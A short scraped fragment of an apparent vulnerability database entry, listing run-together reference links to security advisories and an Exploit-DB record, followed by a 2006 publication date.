http://secunia.com/advisories/19749http://www.osvdb.org/24887http://www.securityfocus.com/bid/17679http://www.vupen.com/english/advisories/2006/1481https://exchange.xforce.ibmcloud.com/vulnerabilities/26063https://www.exploit-db.com/exploits/1711http://secunia.com/advisories/19749http://www.osvdb.org/24887http://www.securityfocus.com/bid/17679http://www.vupen.com/english/advisories/2006/1481https://exchange.xforce.ibmcloud.com/vulnerabilities/26063https://www.exploit-db.com/exploits/1711
2006-04-25
Published